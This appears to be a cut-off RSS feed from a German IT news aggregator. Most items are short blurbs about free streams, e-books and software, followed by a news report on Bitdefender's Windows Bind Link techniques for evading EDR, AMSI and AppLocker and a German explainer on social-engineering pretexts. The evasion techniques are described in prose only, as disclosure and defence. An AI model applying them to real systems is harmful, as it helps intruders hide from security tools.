<content:encoded><![CDATA[WM 2026, ausgerechnet die zwei Erzrivalen treffen im Halbfinale aufeinander – nach Falkland und der Hand Gottes! Gibt es England gegen Argentinien gratis live im TV und Stream? Wer folgt Frankreich ins Endspiel?]]></content:encoded>
</item>
<item>
<title><![CDATA[England gegen Argentinien: So empfangt ihr das Halbfinale der Fußball-WM 2026 kostenlos im TV und Live-Stream]]></title>
<description><![CDATA[Am Mittwochabend startet das zweite Halbfinale der Fußball-WM 2026 zwischen England und Argentinien. Auf diesem Sender seht ihr das Match kostenfrei im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
																	ARD,																	Bundesliga-Live-Stream: Fu...]]></description>
<link>https://tsecurity.de/de/3671380/it-nachrichten/england-gegen-argentinien-so-empfangt-ihr-das-halbfinale-der-fussball-wm-2026-kostenlos-im-tv-und-live-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671380/it-nachrichten/england-gegen-argentinien-so-empfangt-ihr-das-halbfinale-der-fussball-wm-2026-kostenlos-im-tv-und-live-stream/</guid>
<pubDate>Wed, 15 Jul 2026 18:34:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Am Mittwochabend startet das zweite Halbfinale der Fußball-WM 2026 zwischen England und Argentinien. Auf diesem Sender seht ihr das Match kostenfrei im TV und Live-Stream.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/ard.html">ARD</a>,																	<a href="https://www.netzwelt.de/fussball-internet/index.html">Bundesliga-Live-Stream: Fußball im Internet schauen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/waipu-index.html">Waipu.tv</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/magentatv-index.html">MagentaTV</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Schmutziger Western der Extraklasse läuft kostenlos in der ZDF-Mediathek]]></title>
<description><![CDATA[Dieser Film begeistert 94 Prozent aller Kritiker und ist jetzt kostenlos.]]></description>
<link>https://tsecurity.de/de/3671134/it-nachrichten/schmutziger-western-der-extraklasse-laeuft-kostenlos-in-der-zdf-mediathek/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671134/it-nachrichten/schmutziger-western-der-extraklasse-laeuft-kostenlos-in-der-zdf-mediathek/</guid>
<pubDate>Wed, 15 Jul 2026 17:18:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dieser Film begeistert 94 Prozent aller Kritiker und ist jetzt kostenlos.]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung TV Plus im Test: Fernsehen, Filme und Serien kostenlos streamen - gibt es einen Haken?]]></title>
<description><![CDATA[Mit Samsung TV Plus bietet Samsung seinen Kunden ein kostenloses TV-Angebot samt Mediathek an. Eine Streaming-Alternative für Sparfüchse oder nicht der Rede wert?
																					Dieser Artikel wurde einsortiert unter 
																	Samsung,																	Live-TV,																	Intern...]]></description>
<link>https://tsecurity.de/de/3670854/it-nachrichten/samsung-tv-plus-im-test-fernsehen-filme-und-serien-kostenlos-streamen-gibt-es-einen-haken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670854/it-nachrichten/samsung-tv-plus-im-test-fernsehen-filme-und-serien-kostenlos-streamen-gibt-es-einen-haken/</guid>
<pubDate>Wed, 15 Jul 2026 15:48:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit Samsung TV Plus bietet Samsung seinen Kunden ein kostenloses TV-Angebot samt Mediathek an. Eine Streaming-Alternative für Sparfüchse oder nicht der Rede wert?
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/hersteller/samsung.html">Samsung</a>,																	<a href="https://www.netzwelt.de/download/videos/live-tv/index.html">Live-TV</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/">Internet-Fernsehen</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/">Fernsehen über das Internet: Live-TV online schauen mit TV-Streaming-Apps</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/samsung-tv-plus-index.html">Samsung TV Plus</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[New Windows Bind Link techniques let attackers evade EDR, security controls]]></title>
<description><![CDATA[Attackers who already have administrator privileges on a Windows machine have newer ways to slip past endpoint security without exploiting a vulnerable driver or modifying trusted binaries.



Bitdefender researchers have warned against three techniques that abuse Windows Bind Links, a legitimate...]]></description>
<link>https://tsecurity.de/de/3670748/it-security-nachrichten/new-windows-bind-link-techniques-let-attackers-evade-edr-security-controls/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670748/it-security-nachrichten/new-windows-bind-link-techniques-let-attackers-evade-edr-security-controls/</guid>
<pubDate>Wed, 15 Jul 2026 15:09:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Attackers who already have administrator privileges on a Windows machine have newer ways to slip past endpoint security without exploiting a vulnerable driver or modifying trusted binaries.</p>



<p class="wp-block-paragraph">Bitdefender researchers have warned against three techniques that abuse Windows Bind Links, a legitimate filesystem virtualization capability, to occupy security tools with clean files while malicious ones execute undetected.</p>



<p class="wp-block-paragraph">The techniques can be used “to blind EDR sensors and bypass built-in Windows defenses such as AMSI and AppLocker,” the researchers said in a blog post shared with CSO ahead of its publication on Wednesday. Dubbed File Binding, Process-Binding, and Silo-Binding, the techniques exploit the way Windows’ Bind Filter driver “bindflt.sys” redirects file paths in memory.</p>



<p class="wp-block-paragraph">While Microsoft reportedly assessed the issues as low severity because exploiting the techniques requires admin privileges, Bitdefender argued its importance by comparing the threat to Bring Your Own Vulnerable Driver (<a href="https://www.csoonline.com/article/3600750/infostealers-are-using-byovd-to-steal-critical-system-data.html">BYOVD</a>) attacks.</p>



<p class="wp-block-paragraph">Microsoft did not immediately respond to CSO’s request for comment.</p>



<h2 class="wp-block-heading"><a></a>Three attack paths from one weakness</h2>



<p class="wp-block-paragraph">Bitdefender’s research focused on Bind Links, a Windows feature designed for legitimate virtualization scenarios such as Windows Sandbox, Windows containers, and Store applications. Bind Links operate entirely within “bindflt.sys,” allowing one file path to transparently resolve to another without creating a visible filesystem object or modifying the original file.</p>



<p class="wp-block-paragraph">Bitdefender demonstrated how attackers can progressively weaponize this capability.</p>



<p class="wp-block-paragraph">The first technique, File-Binding, redirects trusted DLL or file paths to attacker-controlled replacements. The researchers showed PowerShell loading what appeared to be a legitimate amsi.dll, but the Bind Link instead served a malicious DLL that exported identical functions while silently disabling malware scanning.</p>



<p class="wp-block-paragraph">Process-Binding extends the concept to executable files. Here, the researchers said, Windows reports a trusted executable like “winever.exe” is running, while the operating system actually executes another binary, such as cmd.exe. Because many security products rely on executable paths for allowlisting, signatures, and process identity, the mismatch can trick both security policies and analysts.</p>



<p class="wp-block-paragraph">The most sophisticated of the three, Silo-Binding, leverages Windows silos, the isolation technology in Windows containers, to present different filesystem views inside and outside an isolated environment. The researchers demonstrated a potential malware executing inside the silo as a trusted application, while security tools operating outside the silo read them as legitimate files.</p>



<p class="wp-block-paragraph">Bitdefender demonstrated bypasses against <a href="https://www.csoonline.com/article/1311082/north-koreas-lazarus-deploys-rootkit-via-applocker-zero-day-flaw.html">AppLocker</a>, Windows Firewall, Sysmon, and even executed Invoke-Mimikatz under a trusted process identity to evade detection.</p>



<h2 class="wp-block-heading"><a></a>A potential post-compromise attack vector</h2>



<p class="wp-block-paragraph">Addressing Microsoft’s low-severity assessment, the researchers noted these techniques to be effective post-compromise evasion attacks, rather than a remote code execution vulnerability.</p>



<p class="wp-block-paragraph">“Every Windows 10 RS4+ and Windows 11 system is exposed once an attacker has administrator access on it,” they said. “Every AV and EDR that trusts the image-file path returned by standard process-notification routines is affected.”</p>



<p class="wp-block-paragraph">Bitdefender also disclosed a related privilege escalation scenario involving Docker Desktop, where members of the “docker-users” group could leverage Bind Links to reach SYSTEM privileges.</p>



<p class="wp-block-paragraph">Following the disclosure, Docker reportedly updated its documentation to clarify the security implications of the group’s permissions.</p>



<p class="wp-block-paragraph">While Windows 24H2 introduces a veto mechanism that can block bind-link creations, the researchers described it as only a partial mitigation because it is limited to newer systems, applies only in certain scenarios, and can be bypassed.</p>



<p class="wp-block-paragraph">Instead, they recommended resolving the real backing file rather than trusting process paths, revalidating file identity whenever a file is reopened for hashing or scanning, and enumerating active bind-link mappings to detect silo-scoped abuse.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[GTA Online gratis testen: Kein Abo nötig - aber nur noch diese Woche]]></title>
<description><![CDATA[Bis zum 20. Juli können alle PS5- und Xbox-Series-X|S-Besitzer GTA Online kostenlos spielen, ganz ohne PS Plus oder Game Pass Core.

																					Dieser Artikel wurde einsortiert unter 
																	Gaming,																	Videospiel,																	GTA 6.]]></description>
<link>https://tsecurity.de/de/3670652/it-nachrichten/gta-online-gratis-testen-kein-abo-noetig-aber-nur-noch-diese-woche/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670652/it-nachrichten/gta-online-gratis-testen-kein-abo-noetig-aber-nur-noch-diese-woche/</guid>
<pubDate>Wed, 15 Jul 2026 14:32:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Bis zum 20. Juli können alle PS5- und Xbox-Series-X|S-Besitzer GTA Online kostenlos spielen, ganz ohne PS Plus oder Game Pass Core.

																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/gaming/index.html">Gaming</a>,																	<a href="https://www.netzwelt.de/videospiel/index.html">Videospiel</a>,																	<a href="https://www.netzwelt.de/gta-6/index.html">GTA 6</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Diesen vergessenen FSK-16-Horror-Film seht ihr jetzt gratis im Stream]]></title>
<description><![CDATA[Über 100 Filme basieren auf den Büchern von Horrormeister Stephen King. Einige Adaptionen fliegen dabei unter dem Radar. Aktuell könnt ihr einen dieser vergessenen Body-Horror-Schocker kostenlos und legal auf YouTube streamen.]]></description>
<link>https://tsecurity.de/de/3670590/it-nachrichten/diesen-vergessenen-fsk-16-horror-film-seht-ihr-jetzt-gratis-im-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670590/it-nachrichten/diesen-vergessenen-fsk-16-horror-film-seht-ihr-jetzt-gratis-im-stream/</guid>
<pubDate>Wed, 15 Jul 2026 14:18:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Über 100 Filme basieren auf den Büchern von Horrormeister Stephen King. Einige Adaptionen fliegen dabei unter dem Radar. Aktuell könnt ihr einen dieser vergessenen Body-Horror-Schocker kostenlos und legal auf YouTube streamen.]]></content:encoded>
</item>
<item>
<title><![CDATA[12 Monate Sky inklusive Netflix kostenlos: Neuer Stromtarif bringt Serien, Filme und Fußball obendrauf]]></title>
<description><![CDATA[Wer ohnehin über einen Wechsel des Strom- oder Gasanbieters nachdenkt, kann aktuell doppelt profitieren, denn bei E wie einfach gibt es ein Sky-Abo mit Netflix gratis dazu.
																					Dieser Artikel wurde einsortiert unter 
																	Schnäppchen,																	Netflix.]]></description>
<link>https://tsecurity.de/de/3670409/it-nachrichten/12-monate-sky-inklusive-netflix-kostenlos-neuer-stromtarif-bringt-serien-filme-und-fussball-obendrauf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670409/it-nachrichten/12-monate-sky-inklusive-netflix-kostenlos-neuer-stromtarif-bringt-serien-filme-und-fussball-obendrauf/</guid>
<pubDate>Wed, 15 Jul 2026 13:03:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wer ohnehin über einen Wechsel des Strom- oder Gasanbieters nachdenkt, kann aktuell doppelt profitieren, denn bei E wie einfach gibt es ein Sky-Abo mit Netflix gratis dazu.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/schnaeppchen/index.html">Schnäppchen</a>,																	<a href="https://www.netzwelt.de/tv-sender/netflix.html">Netflix</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Moia nimmt kostenlosen Testbetrieb mit autonomen Shuttles in Hamburg auf]]></title>
<description><![CDATA[In Hamburg können registrierte Nutzer ab sofort kostenlos in autonomen VW ID. Buzz mitfahren. Ende 2026 soll der Regelbetrieb ohne Sicherheitsfahrer starten.]]></description>
<link>https://tsecurity.de/de/3670231/it-nachrichten/moia-nimmt-kostenlosen-testbetrieb-mit-autonomen-shuttles-in-hamburg-auf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670231/it-nachrichten/moia-nimmt-kostenlosen-testbetrieb-mit-autonomen-shuttles-in-hamburg-auf/</guid>
<pubDate>Wed, 15 Jul 2026 12:03:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In Hamburg können registrierte Nutzer ab sofort kostenlos in autonomen VW ID. Buzz mitfahren. Ende 2026 soll der Regelbetrieb ohne Sicherheitsfahrer starten.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zweites Halbfinale der Weltmeisterschaft heute gratis live im TV und Stream]]></title>
<description><![CDATA[Der zweite Halbfinal-Krimi kommt: Sehen Sie die Fußball-Weltmeisterschaft 2026 heute kostenlos live im TV und Stream. Wer folgt Spanien ins Endspiel?]]></description>
<link>https://tsecurity.de/de/3670071/it-nachrichten/zweites-halbfinale-der-weltmeisterschaft-heute-gratis-live-im-tv-und-stream/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670071/it-nachrichten/zweites-halbfinale-der-weltmeisterschaft-heute-gratis-live-im-tv-und-stream/</guid>
<pubDate>Wed, 15 Jul 2026 10:47:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der zweite Halbfinal-Krimi kommt: Sehen Sie die Fußball-Weltmeisterschaft 2026 heute kostenlos live im TV und Stream. Wer folgt Spanien ins Endspiel?]]></content:encoded>
</item>
<item>
<title><![CDATA[Dank Rundfunkgebühren: Amazon-Kracher läuft jetzt gratis in der ZDF-Mediathek]]></title>
<description><![CDATA[Der Streaming-Hit von Amazon ist jetzt auch kostenlos abrufbar.]]></description>
<link>https://tsecurity.de/de/3670016/it-nachrichten/dank-rundfunkgebuehren-amazon-kracher-laeuft-jetzt-gratis-in-der-zdf-mediathek/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670016/it-nachrichten/dank-rundfunkgebuehren-amazon-kracher-laeuft-jetzt-gratis-in-der-zdf-mediathek/</guid>
<pubDate>Wed, 15 Jul 2026 10:33:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Streaming-Hit von Amazon ist jetzt auch kostenlos abrufbar.]]></content:encoded>
</item>
<item>
<title><![CDATA[Download der Woche: Beszel]]></title>
<description><![CDATA[Download der Woche: Beszel

      
      
        
          
            
                



            
          
        
              
    
  Lars Nitsch
Mi., 15.07.2026 - 07:00


            Den Zustand von Servern und Containern im Blick zu behalten, muss nicht zwangsläufig eine umfangr...]]></description>
<link>https://tsecurity.de/de/3670014/server/download-der-woche-beszel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670014/server/download-der-woche-beszel/</guid>
<pubDate>Wed, 15 Jul 2026 10:30:25 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Download der Woche: Beszel</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/download-der-woche-beszel"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/beszel_wide.jpg?itok=1vXsIPYO" width="480" height="319" alt="Dashboard der Open-Source-Software Beszel mit Diagrammen zur CPU-, Speicher- und Datenträgerauslastung sowie zur Überwachung mehrerer Linux-Server und Docker-Container." title="Beszel fasst die Auslastung von Linux-Servern und Docker-Containern in einer zentralen Weboberfläche zusammen und visualisiert Systemkennzahlen in Echtzeit." typeof="foaf:Image" class="image-style-medium">

<span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/109" lang about="https://www.it-administrator.de/user/109" typeof="schema:Person" property="schema:name" datatype class="username">Lars Nitsch</a></span>
<span class="field field--name-created field--type-created field--label-hidden"><time datetime="2026-07-15T07:00:00+02:00" title="Mittwoch, Juli 15, 2026 - 07:00" class="datetime">Mi., 15.07.2026 - 07:00</time>
</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Den Zustand von Servern und Containern im Blick zu behalten, muss nicht zwangsläufig eine umfangreiche Monitoring-Infrastruktur mit Prometheus und Grafana erfordern. Beszel verfolgt einen schlankeren Ansatz: Die Open-Source-Software überwacht Systeme und Docker-Container über eine moderne Weboberfläche und lässt sich mit geringem Aufwand selbst hosten.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items">
          <li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul>
</div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/download-der-woche-beszel" rel="tag" title="Download der Woche: Beszel" hreflang="en">Weiterlesen<span class="visually-hidden"> über Download der Woche: Beszel</span></a></li></ul>  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[10 kostenlose Thalia-E-Books: Lovestorys, Fantasy, Science-Fiction und spannende Thriller]]></title>
<description><![CDATA[Und wieder gibt’s ein paar frische E-Books aus dem Thalia-Angebot kostenlos. 10 Bücher sind heute gratis und ihr könnt die Downloads eurer Bibliothek hinzufügen.]]></description>
<link>https://tsecurity.de/de/3669858/it-nachrichten/10-kostenlose-thalia-e-books-lovestorys-fantasy-science-fiction-und-spannende-thriller/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669858/it-nachrichten/10-kostenlose-thalia-e-books-lovestorys-fantasy-science-fiction-und-spannende-thriller/</guid>
<pubDate>Wed, 15 Jul 2026 09:17:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Und wieder gibt’s ein paar frische E-Books aus dem Thalia-Angebot kostenlos. 10 Bücher sind heute gratis und ihr könnt die Downloads eurer Bibliothek hinzufügen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Heute umsonst: Diese 17 Amazon-E-Books bekommt ihr kostenlos]]></title>
<description><![CDATA[Übernatürliche Katalog-Bräute, uralte Geheimnisse, Psychothriller und viel Liebe in allen Situationen des Lebens – aus diesen Themen könnt ihr heute wählen. Die aktuelle E-Book-Auswahl ist völlig kostenlos.]]></description>
<link>https://tsecurity.de/de/3669743/it-nachrichten/heute-umsonst-diese-17-amazon-e-books-bekommt-ihr-kostenlos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669743/it-nachrichten/heute-umsonst-diese-17-amazon-e-books-bekommt-ihr-kostenlos/</guid>
<pubDate>Wed, 15 Jul 2026 08:32:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Übernatürliche Katalog-Bräute, uralte Geheimnisse, Psychothriller und viel Liebe in allen Situationen des Lebens – aus diesen Themen könnt ihr heute wählen. Die aktuelle E-Book-Auswahl ist völlig kostenlos.]]></content:encoded>
</item>
<item>
<title><![CDATA[RTL+ Probemonat: Kann man den Streamingdienst gratis nutzen?]]></title>
<description><![CDATA[Lange Zeit gab es bei RTL+ eine Möglichkeit, das Angebot kostenlos zu nutzen. Wie es aktuell um den Probemonat steht, verraten wir euch.
																					Dieser Artikel wurde einsortiert unter 
																	Anleitungen,																	Download,																	RTL,																	Video-...]]></description>
<link>https://tsecurity.de/de/3669657/it-nachrichten/rtl-probemonat-kann-man-den-streamingdienst-gratis-nutzen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669657/it-nachrichten/rtl-probemonat-kann-man-den-streamingdienst-gratis-nutzen/</guid>
<pubDate>Wed, 15 Jul 2026 07:47:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Lange Zeit gab es bei RTL+ eine Möglichkeit, das Angebot kostenlos zu nutzen. Wie es aktuell um den Probemonat steht, verraten wir euch.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/anleitung/index.html">Anleitungen</a>,																	<a href="https://www.netzwelt.de/download/index.html">Download</a>,																	<a href="https://www.netzwelt.de/tv-sender/rtl.html">RTL</a>,																	<a href="https://www.netzwelt.de/download/videos/filme-streamen/index.html">Video-Streaming &amp; Filme streamen</a>,																	<a href="https://www.netzwelt.de/download/videos/live-tv/index.html">Live-TV</a>,																	<a href="https://www.netzwelt.de/vergleich/streaming-dienste-test-netflix-disney-plus-amazon-co-vergleich.html">Video-Streaming-Dienste</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/">Internet-Fernsehen</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/rtl-plus-index.html">RTL+</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/rtl-plus/index.html">RTL+</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/rtl-plus-neu-shows-serien-filme/index.html">Neu auf RTL+: Diese Show-, Film- und Serienneuheiten starten im Juli 2026</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Was ist Social Engineering?]]></title>
<description><![CDATA[Mit Social-Engineering-Techniken manipulieren Cyberkriminelle die menschliche Psyche. Lesen Sie, wie das funktioniert und wie Sie sich schützen können.sp3n | shutterstock.com



Selbst wenn Sie bei der Absicherung Ihres Rechenzentrums, Ihrer Cloud-Implementierungen und der physischen Sicherheit I...]]></description>
<link>https://tsecurity.de/de/3669518/it-security-nachrichten/was-ist-social-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669518/it-security-nachrichten/was-ist-social-engineering/</guid>
<pubDate>Wed, 15 Jul 2026 05:53:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/06/sp3n-shutterstock.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Puppet Master 16z9" class="wp-image-4006516" width="1024" height="576" sizes="(max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit Social-Engineering-Techniken manipulieren Cyberkriminelle die menschliche Psyche. Lesen Sie, wie das funktioniert und wie Sie sich schützen können.</figcaption></figure><p class="imageCredit">sp3n | shutterstock.com</p></div>



<p class="wp-block-paragraph">Selbst wenn Sie bei der Absicherung Ihres Rechenzentrums, Ihrer Cloud-Implementierungen und der physischen Sicherheit Ihres Firmengebäudes alle Register ziehen – mit Hilfe von Social Engineering finden gewiefte Cyberkriminelle meistens einen Weg, diese Maßnahmen zu umgehen.</p>



<h2 class="wp-block-heading">Social Engineering – Definition</h2>



<p class="wp-block-paragraph"><a href="https://de.wikipedia.org/wiki/Social_Engineering_(Sicherheit)" title="Social Engineering" target="_blank" rel="noopener">Social Engineering</a> bezeichnet die “Kunst”, menschliche Schwächen auszunutzen, um sich Zugang zu Gebäuden, Systemen oder Daten zu verschaffen. Anstatt zu versuchen, eine Software-Schwachstelle zu finden und auszunutzen, wird ein Social Engineer beispielsweise einen Mitarbeiter anrufen und sich als IT-Support-Angestellter ausgeben, um ihn zur Herausgabe seines Passworts zu bewegen.</p>



<p class="wp-block-paragraph">Der bekannte Hacker Kevin Mitnick hat den Begriff Social Engineering in den 1990er Jahren entscheidend mitgeprägt. Die Grundidee, sich menschliches Verhalten zunutze zu machen und die Techniken dahinter, gibt es allerdings schon so lange, wie es Betrüger gibt.</p>



<h2 class="wp-block-heading">Social Engineering – Techniken</h2>



<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2780856/social-engineering-angriffe-erkennen-und-verhindern.html" title="Social Engineering" target="_blank">Social Engineering</a> hat sich für Cyberkriminelle als besonders erfolgreich erwiesen, wenn es darum geht in Unternehmen einzudringen. Sobald ein Angreifer das Passwort eines vertrauenswürdigen Mitarbeiters erbeutet hat, kann er sich damit einloggen und sensible Daten auslesen. Mit einer Zugangskarte oder einem Code, der physischen Zugang gewährt, können Cyberkriminelle sogar noch größeren Schaden anrichten.</p>



<p class="wp-block-paragraph">Im Artikel “<a href="https://www.csoonline.com/article/2123704/social-engineering--anatomy-of-a-hack.html?nsdr=true" title="Social Engineering: Anatomy of a Hack" target="_blank">Social Engineering: Anatomy of a Hack</a>” beschreibt ein Penetrationtester, wie er aktuelle Ereignisse, öffentlich verfügbare Informationen aus sozialen Netzwerken und ein Hemd mit Cisco-Logo aus einem Second-Hand-Laden dazu nutzte, illegal in ein Unternehmen einzudringen. Das vier Dollar teure Gebrauchthemd half ihm, die Rezeptionisten und andere Mitarbeiter davon zu überzeugen, dass er im Auftrag von Cisco technischen Support leisten müsste. Einmal eingedrungen, war es für ihn ein Leichtes, auch anderen Teammitgliedern Zutritt zu verschaffen. Darüber hinaus gelang es dem <a href="https://www.computerwoche.de/article/2770285/was-ist-pentesting.html" title="Ethical Hacker" target="_blank">Ethical Hacker</a>, mehrere mit Malware verseuchte USB-Sticks in den Räumen zu platzieren und sich in das Unternehmensnetzwerk zu hacken. All das lief vor den Augen der Mitarbeiter ab.</p>



<p class="wp-block-paragraph">Um einen erfolgreichen Social-Engineering-Angriff zu fahren, müssen Sie nicht unbedingt zuerst in einen Second-Hand-Laden gehen, diese Angriffe funktionieren ebenso gut per E-Mail, Telefon oder über soziale Netzwerke. Allen Angriffsarten ist dabei gemein, dass sie menschliche Eigenschaften zu ihrem Vorteil nutzen – beispielsweise Gier, Angst, Neugier oder auch das Bedürfnis, anderen zu helfen.</p>



<p class="wp-block-paragraph">Cyberkriminelle nehmen sich dabei oft Wochen oder Monate Zeit, um ein Ziel auszukundschaften, bevor Sie einen persönlichen Besuch wagen, eine Nachricht senden oder einen Anruf tätigen. Zu den Vorbereitungen kann beispielsweise gehören, eine Telefonliste oder ein Organigramm des Zielunternehmens zu finden oder die Mitarbeiter über <a href="https://www.computerwoche.de/article/2752864/wenn-der-hacker-ueber-linkedin-kommt.html" title="soziale Netzwerke" target="_blank">soziale Netzwerke</a> zu recherchieren. Anschließend können Sie beispielsweise über folgende Wege aktiv werden.</p>



<ul class="wp-block-list">
<li><p><strong>Am Telefon:</strong> Ein Social Engineer könnte anrufen und vorgeben, ein Mitarbeiter oder eine vertrauenswürdige externe Autorität zu sein (zum Beispiel ein Strafverfolgungsbeamter oder ein Wirtschaftsprüfer).</p></li>



<li><p><strong>Im Büro:</strong>“Können Sie mir die Tür aufhalten? Ich habe meinen Schlüssel/ meine Zugangskarte vergessen.” Diesen Satz haben Sie sicher auch schon einmal so vernommen. Auch wenn die fragende Person nicht verdächtig erscheinen mag – das ist eine beliebte Taktik beim Social Engineering.</p></li>



<li><p><strong>Online:</strong> Soziale Netzwerke erleichtern es, Social-Engineering-Angriffe zu fahren. Über Plattformen wie LinkedIn lassen sich schnell und einfach die meisten Mitarbeiter eines Unternehmens finden. Oft kommen noch viele andere Informationen dazu, die unter Umständen für weitere Angriffe nützlich sein können.</p></li>
</ul>



<p class="wp-block-paragraph">Beim Social Engineering werden regelmäßig auch aktuelle Ereignisse, Feiertage oder auch Popkultur-Phänomene dazu eingesetzt, Opfer in die Falle zu locken. Dabei passen die Cyberkriminellen ihre Phishing-Angriffe so an, dass sie auf bestimmte Interessen (Musik, Sport, Politik, etc.) abzielen. Das erhöht die Chance, dass die mit <a href="https://www.computerwoche.de/article/2800283/das-kleine-abc-der-schadsoftware.html" title="Malware" target="_blank">Malware</a> verseuchten Anhänge angeklickt werden.</p>



<h2 class="wp-block-heading">Social Engineering – Angriffsformen</h2>



<ul class="wp-block-list">
